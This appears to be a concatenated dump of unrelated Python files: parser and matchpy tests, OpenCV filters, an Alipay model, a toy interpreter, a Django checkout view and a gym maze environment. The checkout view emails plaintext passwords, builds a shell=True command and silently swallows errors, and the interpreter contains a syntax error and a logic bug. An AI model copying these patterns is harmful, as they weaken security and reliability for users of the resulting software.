'positions', 'children', 'entities'])
def _post_process(edge):
raise NotImplementedError()
def _parse_token(token):
raise NotImplementedError()
def _parse_sentence(self, sent):
self.atom2token = {}
main_edge, extra_edges = self._parse_token(sent.root)
main_edge, _ = self._post_process(main_edge)
return {'main_edge': main_edge,
'extra_edges': extra_edges,
'text': str(sent).strip(),
'spacy_sentence': sent}
def parse(self, text):
"""Transforms the given text into hyperedges + aditional information.
Returns a sequence of dictionaries, with one dictionary for each
sentence found in the text.
Each dictionary contains the following fields:
-> main_edge: the hyperedge corresponding to the sentence.
-> extra_edges: aditional edges, e.g. connecting atoms that appear
in the main_edge to their lemmas.
-> text: the string of natural language text corresponding to the
main_edge, i.e.: the sentence itself.
-> spacy_sentence: the spaCy structure representing the sentence
enriched with NLP annotations.
"""
self.cur_text = text
doc = self.nlp(text.strip())
return tuple(self._parse_sentence(sent) for sent in doc.sents)
|
py | 1a37f5de7e35dec35354fa7cf6eabc2c6e87afed | # -*- coding: utf-8 -*-
from hypothesis import assume, given
import hypothesis.strategies as st
import pytest
from matchpy.expressions.expressions import Arity, Operation, Symbol, Wildcard, Pattern
from matchpy.functions import ReplacementRule, replace, replace_all, substitute, replace_many, is_match
from matchpy.matching.one_to_one import match_anywhere
from matchpy.matching.one_to_one import match as match_one_to_one
from matchpy.matching.many_to_one import ManyToOneReplacer
from .common import *
@pytest.mark.parametrize(
' expr, pattern, do_match',
[
(a, a, True),
(a, b, False),
(f(a), f(x_), True),
]
) # yapf: disable
def test_is_match(expr, pattern, do_match):
assert is_match(expr, Pattern(pattern)) == do_match
class TestSubstitute:
@pytest.mark.parametrize(
' expression, substitution, expected_result, replaced',
[
(a, {}, a, False),
(a, {'x': b}, a, False),
(x_, {'x': b}, b, True),
(x_, {'x': [a, b]}, [a, b], True),
(y_, {'x': b}, y_, False),
(f(x_), {'x': b}, f(b), True),
(f(x_), {'y': b}, f(x_), False),
(f(x_), {}, f(x_), False),
(f(a, x_), {'x': b}, f(a, b), True),
(f(x_), {'x': [a, b]}, f(a, b), True),
(f(x_), {'x': []}, f(), True),
(f(x_, c), {'x': [a, b]}, f(a, b, c), True),
(f(x_, y_), {'x': a, 'y': b}, f(a, b), True),
(f(x_, y_), {'x': [a, c], 'y': b}, f(a, c, b), True),
(f(x_, y_), {'x': a, 'y': [b, c]}, f(a, b, c), True),
(Pattern(f(x_)), {'x': a}, f(a), True)
]
) # yapf: disable
def test_substitute(self, expression, substitution, expected_result, replaced):
result = substitute(expression, substitution)
assert result == expected_result, "Substitution did not yield expected result"
if replaced:
assert result is not expression, "When substituting, the original expression may not be modified"
else:
assert result is expression, "When nothing is substituted, the original expression has to be returned"
def many_replace_wrapper(expression, position, replacement):
return replace_many(expression, [(position, replacement)])
class TestReplaceTest:
@pytest.mark.parametrize('replace', [replace, many_replace_wrapper])
@pytest.mark.parametrize(
' expression, position, replacement, expected_result',
[
(a, (), b, b),
(f(a), (), b, b),
(a, (), f(b), f(b)),
(f(a), (), f(b), f(b)),
(f(a), (0, ), b, f(b)),
(f(a, b), (0, ), c, f(c, b)),
(f(a, b), (1, ), c, f(a, c)),
(f(a), (0, ), [b, c], f(b, c)),
(f(a, b), (0, ), [b, c], f(b, c, b)),
(f(a, b), (1, ), [b, c], f(a, b, c)),
(f(f(a)), (0, ), b, f(b)),
(f(f(a)), (0, 0), b, f(f(b))),
(f(f(a, b)), (0, 0), c, f(f(c, b))),
(f(f(a, b)), (0, 1), c, f(f(a, c))),
(f(f(a, b), f(a, b)), (0, 0), c, f(f(c, b), f(a, b))),
(f(f(a, b), f(a, b)), (0, 1), c, f(f(a, c), f(a, b))),
(f(f(a, b), f(a, b)), (1, 0), c, f(f(a, b), f(c, b))),
(f(f(a, b), f(a, b)), (1, 1), c, f(f(a, b), f(a, c))),
(f(f(a, b), f(a, b)), (0, ), c, f(c, f(a, b))),
(f(f(a, b), f(a, b)), (1, ), c, f(f(a, b), c)),
]
) # yapf: disable
def test_substitution_match(self, replace, expression, position, replacement, expected_result):
result = replace(expression, position, replacement)
assert result == expected_result, "Replacement did not yield expected result ({!r} {!r} -> {!r})".format(
expression, position, replacement
)
assert result is not expression, "Replacement modified the original expression"
@pytest.mark.parametrize('replace', [replace, many_replace_wrapper])
def test_too_big_position_error(self, replace):
with pytest.raises(IndexError):
replace(a, (0, ), b)
with pytest.raises(IndexError):
replace(f(a), (0, 0), b)
with pytest.raises(IndexError):
replace(f(a), (1, ), b)
with pytest.raises(IndexError):
replace(f(a, b), (2, ), b)
class TestReplaceManyTest:
@pytest.mark.parametrize(
' expression, replacements, expected_result',
[
(f(a, b), [((0, ), b), ((1, ), a)], f(b, a)),
(f(a, b), [((0, ), [c, c]), ((1, ), a)], f(c, c, a)),
(f(a, b), [((0, ), b), ((1, ), [c, c])], f(b, c, c)),
(f(f2(a, b), c), [((0, 0), b), ((0, 1), a)], f(f2(b, a), c)),
(f_c(c, f2(a, b)), [((1, 0), b), ((1, 1), a)], f_c(c, f2(b, a))),
(f(f2(a, b), f2(c)), [((1, 0), b), ((0, 1), a)], f(f2(a, a), f2(b))),
(f(f2(a, b), f2(c)), [((0, 1), a), ((1, 0), b)], f(f2(a, a), f2(b))),
(f_c(f2(c), f2(a, b)), [((0, 0), b), ((1, 1), a)], f_c(f2(b), f2(a, a))),
(f_c(f2(c), f2(a, b)), [((1, 1), a), ((0, 0), b)], f_c(f2(b), f2(a, a))),
]
) # yapf: disable
def test_substitution_match(self, expression, replacements, expected_result):
result = replace_many(expression, replacements)
assert result == expected_result, "Replacement did not yield expected result ({!r} -> {!r})".format(
expression, replacements
)
assert result is not expression, "Replacement modified the original expression"
def test_inconsistent_position_error(self):
with pytest.raises(IndexError):
replace_many(f(a), [((), b), ((0, ), b)])
with pytest.raises(IndexError):
replace_many(a, [((), b), ((0, ), b)])
with pytest.raises(IndexError):
replace_many(a, [((0, ), b), ((1, ), b)])
def test_empty_replace(self):
expression = f(a, b)
result = replace_many(expression, [])
assert expression is result, "Empty replacements should not change the expression."
@pytest.mark.parametrize(
' expression, pattern, expected_results',
[ # Substitution Position
(f(a), f(x_), [({'x': a}, ())]),
(f(a), x_, [({'x': f(a)}, ()),
({'x': a}, (0, ))]),
(f(a, f2(b), f2(f2(c), f2(a), f2(f2(b))), f2(c), c), f2(x_), [({'x': b}, (1, )),
({'x': c}, (2, 0)),
({'x': a}, (2, 1)),
({'x': f2(b)}, (2, 2)),
({'x': b}, (2, 2, 0)),
({'x': c}, (3, ))])
]
) # yapf: disable
def test_match_anywhere(expression, pattern, expected_results):
expression = expression
pattern = Pattern(pattern)
results = list(match_anywhere(expression, pattern))
assert len(results) == len(expected_results), "Invalid number of results"
for result in expected_results:
assert result in results, "Results differ from expected"
def test_match_anywhere_error():
with pytest.raises(ValueError):
next(match_anywhere(f(x_), f(x_)))
def test_match_error():
with pytest.raises(ValueError):
next(match_one_to_one(f(x_), f(x_)))
def _many_to_one_replace(expression, rules):
return ManyToOneReplacer(*rules).replace(expression)
@pytest.mark.parametrize(
'replacer', [replace_all, _many_to_one_replace]
)
def test_logic_simplify(replacer):
LAnd = Operation.new('and', Arity.variadic, 'LAnd', associative=True, one_identity=True, commutative=True)
LOr = Operation.new('or', Arity.variadic, 'LOr', associative=True, one_identity=True, commutative=True)
LXor = Operation.new('xor', Arity.variadic, 'LXor', associative=True, one_identity=True, commutative=True)
LNot = Operation.new('not', Arity.unary, 'LNot')
LImplies = Operation.new('implies', Arity.binary, 'LImplies')
Iff = Operation.new('iff', Arity.binary, 'Iff')
___ = Wildcard.star()
a1 = Symbol('a1')
a2 = Symbol('a2')
a3 = Symbol('a3')
a4 = Symbol('a4')
a5 = Symbol('a5')
a6 = Symbol('a6')
a7 = Symbol('a7')
a8 = Symbol('a8')
a9 = Symbol('a9')
a10 = Symbol('a10')
a11 = Symbol('a11')
LBot = Symbol(u'⊥')
LTop = Symbol(u'⊤')
expression = LImplies(
LAnd(
Iff(
Iff(LOr(a1, a2), LOr(LNot(a3), Iff(LXor(a4, a5), LNot(LNot(LNot(a6)))))),
LNot(
LAnd(
LAnd(a7, a8),
LNot(
LXor(
LXor(LOr(a9, LAnd(a10, a11)), a2),
LAnd(LAnd(a11, LXor(a2, Iff(a5, a5))), LXor(LXor(a7, a7), Iff(a9, a4)))
)
)
)
)
),
LImplies(
Iff(
Iff(LOr(a1, a2), LOr(LNot(a3), Iff(LXor(a4, a5), LNot(LNot(LNot(a6)))))),
LNot(
LAnd(
LAnd(a7, a8),
LNot(
LXor(
LXor(LOr(a9, LAnd(a10, a11)), a2),
LAnd(LAnd(a11, LXor(a2, Iff(a5, a5))), LXor(LXor(a7, a7), Iff(a9, a4)))
)
)
)
)
),
LNot(
LAnd(
LImplies(
LAnd(a1, a2),
LNot(
LXor(
LOr(
LOr(
LXor(LImplies(LAnd(a3, a4), LImplies(a5, a6)), LOr(a7, a8)),
LXor(Iff(a9, a10), a11)
), LXor(LXor(a2, a2), a7)
), Iff(LOr(a4, a9), LXor(LNot(a6), a6))
)
)
), LNot(Iff(LNot(a11), LNot(a9)))
)
)
)
),
LNot(
LAnd(
LImplies(
LAnd(a1, a2),
LNot(
LXor(
LOr(
LOr(
LXor(LImplies(LAnd(a3, a4), LImplies(a5, a6)), LOr(a7, a8)),
LXor(Iff(a9, a10), a11)
), LXor(LXor(a2, a2), a7)
), Iff(LOr(a4, a9), LXor(LNot(a6), a6))
)
)
), LNot(Iff(LNot(a11), LNot(a9)))
)
)
)
rules = [
# xor(x,⊥) → x
ReplacementRule(
Pattern(LXor(x__, LBot)),
lambda x: LXor(*x)
),
# xor(x, x) → ⊥
ReplacementRule(
Pattern(LXor(x_, x_, ___)),
lambda x: LBot
),
# and(x,⊤) → x
ReplacementRule(
Pattern(LAnd(x__, LTop)),
lambda x: LAnd(*x)
),
# and(x,⊥) → ⊥
ReplacementRule(
Pattern(LAnd(__, LBot)),
lambda: LBot
),
# and(x, x) → x
ReplacementRule(
Pattern(LAnd(x_, x_, y___)),
lambda x, y: LAnd(x, *y)
),
# and(x, xor(y, z)) → xor(and(x, y), and(x, z))
ReplacementRule(
Pattern(LAnd(x_, LXor(y_, z_))),
lambda x, y, z: LXor(LAnd(x, y), LAnd(x, z))
),
# implies(x, y) → not(xor(x, and(x, y)))
ReplacementRule(
Pattern(LImplies(x_, y_)),
lambda x, y: LNot(LXor(x, LAnd(x, y)))
),
# not(x) → xor(x,⊤)
ReplacementRule(
Pattern(LNot(x_)),
lambda x: LXor(x, LTop)
),
# or(x, y) → xor(and(x, y), xor(x, y))
ReplacementRule(
Pattern(LOr(x_, y_)),
lambda x, y: LXor(LAnd(x, y), LXor(x, y))
),
# iff(x, y) → not(xor(x, y))
ReplacementRule(
Pattern(Iff(x_, y_)),
lambda x, y: LNot(LXor(x, y))
),
] # yapf: disable
result = replacer(expression, rules)
assert result == LBot
|
py | 1a37f5ecb6e695f4680326bd7500943ed77bbd6f | from ast import Mod
import cv2
import numpy as np
import os
from matplotlib import pyplot
def edit():
#Read the image
image = cv2.imread('Media/sample.jpg')
#greyscale filter
def greyscale(img):
greyscale = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
return greyscale
# brightness adjustment
def bright(img, beta_value ):
img_bright = cv2.convertScaleAbs(img, beta=beta_value)
return img_bright
#sharp effect
def sharpen(img):
kernel = np.array([[-1, -1, -1], [-1, 9.5, -1], [-1, -1, -1]])
img_sharpen = cv2.filter2D(img, -1, kernel)
return img_sharpen
#sepia effect
def sepia(img):
img_sepia = np.array(img, dtype=np.float64) # converting to float to prevent loss
img_sepia = cv2.transform(img_sepia, np.matrix([[0.272, 0.534, 0.131],
[0.349, 0.686, 0.168],
[0.393, 0.769, 0.189]])) # multipying image with special sepia matrix
img_sepia[np.where(img_sepia > 255)] = 255 # normalizing values greater than 255 to 255
img_sepia = np.array(img_sepia, dtype=np.uint8)
return img_sepia
#grey pencil sketch effect
def pencil_sketch_grey(img):
#inbuilt function to create sketch effect in colour and greyscale
sk_gray, sk_color = cv2.pencilSketch(img, sigma_s=60, sigma_r=0.07, shade_factor=0.1)
return sk_gray
#colour pencil sketch effect
def pencil_sketch_col(img):
#inbuilt function to create sketch effect in colour and greyscale
sk_gray, sk_color = cv2.pencilSketch(img, sigma_s=60, sigma_r=0.07, shade_factor=0.1)
return sk_color
#HDR effect
def HDR(img):
hdr = cv2.detailEnhance(img, sigma_s=12, sigma_r=0.15)
return hdr
# invert filter
def invert(img):
inv = cv2.bitwise_not(img)
return inv
#defining a function
from scipy.interpolate import UnivariateSpline
def LookupTable(x, y):
spline = UnivariateSpline(x, y)
return spline(range(256))
#summer effect
def Summer(img):
increaseLookupTable = LookupTable([0, 64, 128, 256], [0, 80, 160, 256])
decreaseLookupTable = LookupTable([0, 64, 128, 256], [0, 50, 100, 256])
blue_channel, green_channel, red_channel = cv2.split(img)
red_channel = cv2.LUT(red_channel, increaseLookupTable).astype(np.uint8)
blue_channel = cv2.LUT(blue_channel, decreaseLookupTable).astype(np.uint8)
sum= cv2.merge((blue_channel, green_channel, red_channel ))
return sum
#winter effect
def Winter(img):
increaseLookupTable = LookupTable([0, 64, 128, 256], [0, 80, 160, 256])
decreaseLookupTable = LookupTable([0, 64, 128, 256], [0, 50, 100, 256])
blue_channel, green_channel, red_channel = cv2.split(img)
red_channel = cv2.LUT(red_channel, decreaseLookupTable).astype(np.uint8)
blue_channel = cv2.LUT(blue_channel, increaseLookupTable).astype(np.uint8)
win= cv2.merge((blue_channel, green_channel, red_channel))
return win
#making the greyscale image
a1 = greyscale(image)
filename = 'greyscale.jpg'
# Using cv2.imwrite() method
# Saving the image
cv2.imwrite(f'Edited/{filename}', a1)
#making the more bright image
#positive beta value
a2 = bright(image, 60)
filename = 'more_bright.jpg'
# Using cv2.imwrite() method
# Saving the image
cv2.imwrite(f'Edited/{filename}', a2)
#making the less bright image
#negative beta value
a3 = bright(image, -60)
filename = 'less_bright.jpg'
# Using cv2.imwrite() method
# Saving the image
cv2.imwrite(f'Edited/{filename}', a3)
#making the sharp image
a4 = sharpen(image)
filename = 'sharpen.jpg'
# Using cv2.imwrite() method
# Saving the image
cv2.imwrite(f'Edited/{filename}', a4)
#making the sepia image
a5 = sepia(image)
filename = 'sepia.jpg'
# Using cv2.imwrite() method
# Saving the image
cv2.imwrite(f'Edited/{filename}', a5)
#making the grey pencil sketch
a6 = pencil_sketch_grey(image)
filename = 'pencil_grey.jpg'
# Using cv2.imwrite() method
# Saving the image
cv2.imwrite(f'Edited/{filename}', a6)
#making the colour pencil sketch
a7 = pencil_sketch_col(image)
filename = 'pencil_col.jpg'
# Using cv2.imwrite() method
# Saving the image
cv2.imwrite(f'Edited/{filename}', a7)
#making the hdr img
a8 = HDR(image)
filename = 'HDR.jpg'
# Using cv2.imwrite() method
# Saving the image
cv2.imwrite(f'Edited/{filename}', a8)
#making the invert img
a9 = invert(image)
filename = 'invert.jpg'
# Using cv2.imwrite() method
# Saving the image
cv2.imwrite(f'Edited/{filename}', a9)
#making the summer img
a11 = Summer(image)
filename = 'Summer.jpg'
# Using cv2.imwrite() method
# Saving the image
cv2.imwrite(f'Edited/{filename}', a11)
#making the winter img
a10 = Winter(image)
filename = 'Winter.jpg'
# Using cv2.imwrite() method
# Saving the image
cv2.imwrite(f'Edited/{filename}', a10)
os.startfile('Edited') |
py | 1a37f7d16ced6b916f69d1e9b62ff50f6f0fd322 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class KoubeiMarketingCampaignMemberRelationUnbindModel(object):
def __init__(self):
self._member_template_id = None
self._out_member_no = None
self._request_id = None
self._user_id = None
@property
def member_template_id(self):
return self._member_template_id
@member_template_id.setter
def member_template_id(self, value):
self._member_template_id = value
@property
def out_member_no(self):
return self._out_member_no
@out_member_no.setter
def out_member_no(self, value):
self._out_member_no = value
@property
def request_id(self):
return self._request_id
@request_id.setter
def request_id(self, value):
self._request_id = value
@property
def user_id(self):
return self._user_id
@user_id.setter
def user_id(self, value):
self._user_id = value
def to_alipay_dict(self):
params = dict()
if self.member_template_id:
if hasattr(self.member_template_id, 'to_alipay_dict'):
params['member_template_id'] = self.member_template_id.to_alipay_dict()
else:
params['member_template_id'] = self.member_template_id
if self.out_member_no:
if hasattr(self.out_member_no, 'to_alipay_dict'):
params['out_member_no'] = self.out_member_no.to_alipay_dict()
else:
params['out_member_no'] = self.out_member_no
if self.request_id:
if hasattr(self.request_id, 'to_alipay_dict'):
params['request_id'] = self.request_id.to_alipay_dict()
else:
params['request_id'] = self.request_id
if self.user_id:
if hasattr(self.user_id, 'to_alipay_dict'):
params['user_id'] = self.user_id.to_alipay_dict()
else:
params['user_id'] = self.user_id
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = KoubeiMarketingCampaignMemberRelationUnbindModel()
if 'member_template_id' in d:
o.member_template_id = d['member_template_id']
if 'out_member_no' in d:
o.out_member_no = d['out_member_no']
if 'request_id' in d:
o.request_id = d['request_id']
if 'user_id' in d:
o.user_id = d['user_id']
return o
|
py | 1a37f8306327236dbc180c4317266626d394ba8d | from sly import Lexer
from sly import Parser
import sys
#--------------------------
# While Loop
# Del Var
# Print stmt
# EQEQ, LEQ
#--------------------------
class BasicLexer(Lexer):
tokens = { NAME, NUMBER, STRING, IF, FOR, PRINT, CREATEFILE, WRITE, EQEQ, TO, THING}
ignore = '\t '
literals = { '=', '+', '-', '/', '*', '(', ')', ',', ';', ':', '.'}
# Define tokens
IF = r'if'
#FUN = r'function'
FOR = r'for'
TO = r','
PRINT = r'PRINT'
CREATEFILE = r'createfile'
WRITE = 'write'
THING = r'@[a-zA-Z_][a-zA-Z0-9_]*'
NAME = r'[a-zA-Z_][a-zA-Z0-9_]*'
STRING = r'\".*?\"'
EQEQ = r'=='
@_(r'\d+')
def NUMBER(self, t):
t.value = int(t.value)
return t
@_(r'#.*')
def COMMENT(self, t):
pass
#@_(r'@[a-zA-Z_][a-zA-Z0-9_]*')
#def thing(self, t):
# return t
@_(r'\n+')
def newline(self,t ):
self.lineno = t.value.count('\n')
class BasicParser(Parser):
debugfile = 'parser.out'
tokens = BasicLexer.tokens
precedence = (
('left', '+', '-'),
('left', '*', '/'),
('right', 'UMINUS'),
)
def __init__(self):
self.env = { }
@_('')
def statement(self, p):
pass
#fzr update de syntax
@_('NAME "(" ")" ":" statement')
def statement(self, p):
return ('fun_def', p.NAME, p.statement)
@_('FOR "(" var_assign TO expr ")" ":" statement')
def statement(self, p):
return ('for_loop', ('for_loop_setup', p.var_assign, p.expr), p.statement)
@_('IF "(" condition ")" ":" statement')
def statement(self, p):
return ('if_stmt', p.condition, p.statement)
@_('NAME "(" ")"')
def statement(self, p):
return ('fun_call', p.NAME)
@_('var_assign')
def statement(self, p):
return p.var_assign
@_('NAME "=" STRING')
def var_assign(self, p):
return ('var_assign', p.NAME, p.STRING)
@_('NAME "=" statement')
def var_assign(self, p):
return ('var_assign', p.NAME, p.statement)
@_('PRINT "(" things ")"')
def statement(self, p):
return ('print_stmt', *p.things)
@_('things TO THING')
def things(self, p):
p.things.append(p.THING)
return p.things
@_('THING')
def things(self, p):
#return [ p.THING ]
@_('CREATEFILE "(" STRING ")"')
def statement(self, p):
return ('createfile_stmt', p.STRING)
@_('STRING "." WRITE "(" STRING ")"')
def statement(self, p):
return ('add_to_file_stmt', p.STRING0 ,p.STRING1)
@_('expr')
def statement(self, p):
return (p.expr)
@_('expr "+" expr')
def expr(self, p):
return ('add', p.expr0, p.expr1)
@_('expr "-" expr')
def expr(self, p):
return ('sub', p.expr0, p.expr1)
@_('expr "*" expr')
def expr(self, p):
return ('mul', p.expr0, p.expr1)
@_('expr "/" expr')
def expr(self, p):
return ('div', p.expr0, p.expr1)
@_('expr EQEQ expr')
def condition(self, p):
return ('condition_eqeq', p.expr0, p.expr1)
@_('"-" expr %prec UMINUS')
def expr(self, p):
return p.expr
@_('NAME')
def expr(self, p):
return ('var', p.NAME)
@_('NUMBER')
def expr(self, p):
return ('num', p.NUMBER)
class BasicExecute:
def __init__(self, tree, env):
self.env = env
result = self.walkTree(tree)
#print(env)
if result is not None and isinstance(result, int):
print(result)
if isinstance(result, str) and result[0] == '"':
print(result)
def walkTree(self, node):
if isinstance(node, int):
return node
if isinstance(node, str):
return node
if node is None:
return None
if node[0] == 'program':
if node[1] == None:
self.walkTree(node[2])
else:
self.walkTree(node[1])
self.walkTree(node[2])
if node[0] == 'num':
return node[1]
if node[0] == 'str':
return node[1]
if node[0] == 'if_stmt':
result = self.walkTree(node[1])
if result:
return self.walkTree(node[1][1])
if node[0] == 'fun_def':
self.env[node[1]] = node[2]
if node[0] == 'fun_call':
try:
return self.walkTree(self.env[node[1]])
except LookupError:
print("Undefined function '%s'" % node[1])
return 0
if node[0] == 'add':
return self.walkTree(node[1]) + self.walkTree(node[2])
elif node[0] == 'sub':
return self.walkTree(node[1]) - self.walkTree(node[2])
elif node[0] == 'mul':
return self.walkTree(node[1]) * self.walkTree(node[2])
elif node[0] == 'div':
return self.walkTree(node[1]) / self.walkTree(node[2])
if node[0] == 'condition_eqeq':
return self.walkTree(node[1]) == self.walkTree(node[2])
if node[0] == 'var_assign':
self.env[node[1]] = self.walkTree(node[2])
return node[1]
if node[0] == 'var':
try:
return self.env[node[1]]
except LookupError:
print("Undefined variable '"+node[1]+"' found!")
return 0
if node[0] == 'for_loop':
if node[1][0] == 'for_loop_setup':
loop_setup = self.walkTree(node[1])
#searches for the var in the env and gets it's value
loop_count = self.env[loop_setup[0]]
loop_limit = loop_setup[1]
for i in range(loop_count+1, loop_limit+1):
res = self.walkTree(node[2])
self.env[loop_setup[0]] = i
del self.env[loop_setup[0]]
if node[0] == 'for_loop_setup':
return (self.walkTree(node[1]), self.walkTree(node[2]))
if node[0] == 'print_stmt':
res = self.walkTree(node[1])
print(res)
if node[0] == 'print_stmt_string':
res = self.walkTree(node[1][1:-1])
print(res)
if node[0] == 'createfile_stmt':
file : str = self.walkTree(node[1][1:-1])
with open(file, 'a') as f:
pass
#node 1 2
if node[0] == 'write_to_file_stmt':
print(node[2])
try:
file : str = self.walkTree(node[1][1:-1])
with open(file, 'w') as f:
f.write(self.walkTree(node[2][1:-1]))
except LookupError:
print("file or dir '"+node[1][1:-1]+"' not found!")
return 0
if __name__ == '__main__':
lexer = BasicLexer()
parser = BasicParser()
env = {}
try:
file : str = sys.argv[1]
try:
with open(file, 'r', encoding="utf-8") as f:
line : str
for line in f:
try:
text = line
except EOFError:
break
if text:
tree = parser.parse(lexer.tokenize(text))
BasicExecute(tree, env)
except:
print('the specified file "{}" was not found!'.format(file))
except:
while True:
try:
text = input('haya development edition > ')
except EOFError:
break
if text:
tree = parser.parse(lexer.tokenize(text))
BasicExecute(tree, env)
#parsetree = parser.parse(lexer.tokenize(text))
#print(parsetree)
|
py | 1a37f8a6bbc075dac51e27aaef684cdb14f21f0c | from __future__ import print_function
import random
import string
import subprocess
import time
from configparser import SafeConfigParser
import MySQLdb
from django.contrib.auth.mixins import LoginRequiredMixin
from django.core.mail import EmailMessage
from django.http import JsonResponse
from django.views.generic import View
from billing.models import Transaction, ItemCount, RestrictedRequest
from digitalmarket.mixins import AjaxRequiredMixin
from notifications.models import NotificationItem
from flows.models import Flow
#NP_PATH = '/home/zxc/Desktop/frontend/src/np'
#CHECKOUT_LOG_PATH = '/home/zxc/Desktop/checkout_log'
class CheckoutAjaxView(LoginRequiredMixin, AjaxRequiredMixin, View):
"""
View for the checkout function
Add password, send email, send notification, send flow, deal with restricted permission
"""
# Added: sending message to the broker
def _sendAdminEmail(self, user, seller, topic, prod_num, message, request_file, restricted_active, request,
product_obj):
config = SafeConfigParser()
config.read('/code/config.ini')
db = MySQLdb.connect(host=config.get('main', 'mysql_host'), # your host, usually localhost
user=config.get('main', 'mysql_name'), # your username
passwd=config.get('main', 'mysql_pw'), # your password
db=config.get('main', 'mysql_db')) # your database
cur = db.cursor()
log = config.get('main', 'checkout_log_path')
NP_PATH = config.get('main', 'np_path')
username = user.username
user_email = user.email
topic = topic
# Password with 6 characters (lower case + number)
original_password = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(12))
if not cur.execute("select (1) from users where username = %s limit 1", (username,)):
command = NP_PATH + ' ' + '-p' + ' ' + original_password
command_bytes = command.encode('utf-8')
pw_bytes = subprocess.Popen(command_bytes, stdout=subprocess.PIPE, shell=True).communicate()[0]
password = pw_bytes.decode().rstrip('\n')
cur.execute("insert into users (username,pw,user_id) values (%s,%s,%s)",
(username, password, user.id)) # stdout: ignore '\n'
# Send password to email
subject = 'Your new password'
msg = "Your password to I3 is: " + original_password
email = EmailMessage(subject, msg, to=[user_email])
email.send()
# Record email as notification
notification_box = request.user.get_notification_box()
notification_item = NotificationItem(
notification_box=notification_box,
subject=subject,
body=msg)
notification_item.save()
# To do: make topic as a product obj that can be linked to
flow_obj = Flow.objects.create(
user=request.user,
topic=topic,
direction='in',
state='inactive')
flow_obj.save()
# send to the user which topic is able to pub/sub
# when the topic is unrestricted: insert to acls and send confirmation back to buyer
if not restricted_active:
subject = 'New product purchased'
msg = 'Now you can subscribe to topic: ' + topic + '.'
email = EmailMessage(subject, msg, to=[user_email])
email.send()
# Record email as notification
notification_box = request.user.get_notification_box()
notification_item = NotificationItem(
notification_box=notification_box,
subject=subject,
body=msg)
notification_item.save()
subject = 'New buyer of an unrestricted topic'
msg = 'Buyer ' + username + ' just bought product ' + topic + '.'
email = EmailMessage(subject, msg, to=[seller.email])
email.send()
# Record email as notification
notification_box = seller.get_notification_box()
notification_item = NotificationItem(
notification_box=notification_box,
subject=subject,
body=msg)
notification_item.save()
# insert into acls table
rw = 1 # seller: can read and write
if product_obj.sensor_type >= 2:
rw = 2
cur.execute("insert into acls (username,topic,rw,user_id, topic_id) values (%s,%s,%s,%s,%s)",
(username, topic, str(rw), user.id, product_obj.id))
# write new sub info to log
with open(log, 'a') as f:
f.write(str(time.time()) + ': New Sub ' + username + ' ' + topic + ' ' + str(prod_num) + '\n')
else:
restricted_request_obj = RestrictedRequest(
seller=product_obj.seller,
requester=request.user,
product=product_obj,
price=product_obj.price,
quantity=prod_num,
intention=message,
attachment=request_file
)
restricted_request_obj.save()
subject = 'New product purchased (to be confirmed)'
msg = 'Waiting seller to confirm purchase of ' + topic + '.'
email = EmailMessage(subject, msg, to=[user_email])
email.send()
# Record email as notification
notification_box = request.user.get_notification_box()
notification_item = NotificationItem(
notification_box=notification_box,
subject=subject,
body=msg)
notification_item.save()
subject = 'New buyer of a restricted topic'
msg = 'Buyer ' + username + ' just bought product ' + topic + '. You need to approve the purchase.'
email = EmailMessage(subject, msg, to=[seller.email])
email.send()
# Record email as notification
notification_box = seller.get_notification_box()
notification_item = NotificationItem(
notification_box=notification_box,
subject=subject,
body=msg)
notification_item.save()
db.commit()
def post(self, request, *args, **kwargs):
# TODO: add credit card processing
user = request.user
cart = user.get_cart()
if cart.num_items() == 0:
data = {
'success': False,
'errMsg': 'Your cart is empty'
}
return JsonResponse(data=data)
processed_items = []
for item in cart.all_items():
# TODO: how to handle restricted?
transaction = Transaction(
buyer=request.user,
seller=item.product.seller,
product=item.product,
price=item.product.get_price * item.quantity,
quantity=item.quantity,
)
transaction.save()
item_count = ItemCount(
buyer=request.user,
product=item.product,
order=item.quantity,
quantity=item.quantity,
)
item_count.save()
try:
self._sendAdminEmail(user, item.product.seller, item.product.title, item.quantity,
item.intention, item.attachment, item.product.restricted_active, request,
item.product)
processed_items.append(item)
except:
# TODO: log error, recover, try again?
pass
links = []
for item in processed_items:
download_link = item.product.get_download()
preview_link = download_link + "?preview=True"
link = {
"download": download_link,
"preview": preview_link,
}
links.append(link)
item.delete()
data = {
'success': True,
'links': links
}
return JsonResponse(data=data)
class RequestsAjaxView(LoginRequiredMixin, AjaxRequiredMixin, View):
"""
seller decides whether to approve or decline the buy product request
return Json object for frontend Ajax call
"""
def post(self, request, *args, **kwargs):
request_id = kwargs['pk']
restricted_request = RestrictedRequest.objects.get(pk=request_id)
if restricted_request.seller != request.user:
data = {
'success': False,
'errMsg': 'Request not found',
'errCode': '404'
}
else:
task = kwargs['task']
if task == 'approve':
restricted_request.success = 1
else:
restricted_request.success = 0
restricted_request.replied = True
restricted_request.save()
data = {
'success': True
}
return JsonResponse(data=data)
|
py | 1a37f9d2731d98e018c6b4208503917077d467ec | import gym
from gym.spaces import Box, Discrete, Tuple
import logging
import random
import numpy as np
logger = logging.getLogger(__name__)
# Agent has to traverse the maze from the starting position S -> F
# Observation space [x_pos, y_pos, wind_direction]
# Action space: stay still OR move in current wind direction
MAP_DATA = """
###########################
# S #
# ### #
# ### #
# ### #
# F #
###########################"""
class MazeEnv(gym.Env):
def __init__(self, env_config={}):
self.map = [m for m in MAP_DATA.split("\n") if m]
self.x_dim = len(self.map)
self.y_dim = len(self.map[0])
logger.info("Loaded map {} {}".format(self.x_dim, self.y_dim))
for x in range(self.x_dim):
for y in range(self.y_dim):
if self.map[x][y] == "S":
self.start_pos = (x, y)
elif self.map[x][y] == "F":
self.end_pos = (x, y)
logger.info("Start pos {} end pos {}".format(self.start_pos,
self.end_pos))
# self.observation_space = Tuple([
# Box(0, 100, shape=(2, )), # (x, y)
# Discrete(4), # wind direction (N, E, S, W)
# ])
self.observation_space = Box(0, 100, shape=(2,))
self.action_space = Discrete(4) # whether to move or not
self.viewer = None
self.h = len(self.map)
self.w = len(self.map[0])
self.frame = 255 * np.ones((self.h, self.w, 3), dtype=np.uint8)
self.bg = 255 * np.ones((self.h, self.w, 3), dtype=np.uint8)
for ridx in range(self.h):
for cidx in range(self.w):
if self.map[ridx][cidx] == "#":
self.bg[ridx, cidx, :] = [255, 0, 0]
self.frame = self.bg.copy()
